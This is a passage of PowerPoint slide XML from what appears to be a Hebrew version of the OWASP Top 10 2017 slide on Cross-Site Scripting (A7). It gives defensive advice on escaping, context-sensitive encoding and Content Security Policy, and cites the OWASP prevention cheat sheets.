              <a:t> דורשת הפרדת מידע בלתי מאומת מתוכן פעיל בצד הדפדפן. ניתן להשיג זאת באמצעות:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שימוש במסגרות עבודה אשר מבצעות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בצורה מובנית, כגון הגרסה האחרונה של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ruby on Rails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. למד את מגבלות כל אחת ממסגרות העבודה להגנה מפני מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> והשתמש בהתאם במקרים אשר אינם מטופלים ע"י מסגרות אלו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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ביצוע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לבקשות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בלתי מאומתות למידע בהתבסס על הקשר הפלט של ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (גוף הבקשה, מאפיינים, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) יפתור פגיעויות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. מסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet ‘XSS Prevention’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מכיל פירוט אודות שיטות לביצוע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> למידע.</a:t>
            </a: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הכלה של קידוד מבוסס-הקשר (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>context-sensitive encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) כאשר מעדכנים את הדפדפן בצד משתמש הקצה לפעול כנגד מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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כאשר לא ניתן להימנע מכך, שיטות דומות לקידוד מבוסס-הקשר ניתנות ליישום לממשקי הפיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) של הדפדפן כפי שמתואר במסמך  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet ‘DOM based XSS Prevention’</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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הפעלת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> הינה בקרת הגנה בשכבות כנגד מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. הגנה זו יעילה במידה ואין פגיעויות נוספות אשר עשויות לאפשר אחסון קוד זדוני באמצעות שימוש בצירוף קבצים (דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>path traversal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>overwrites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או ספריות פגיעות מתוך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802150497"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול: 3</a:t>
                      </a:r>
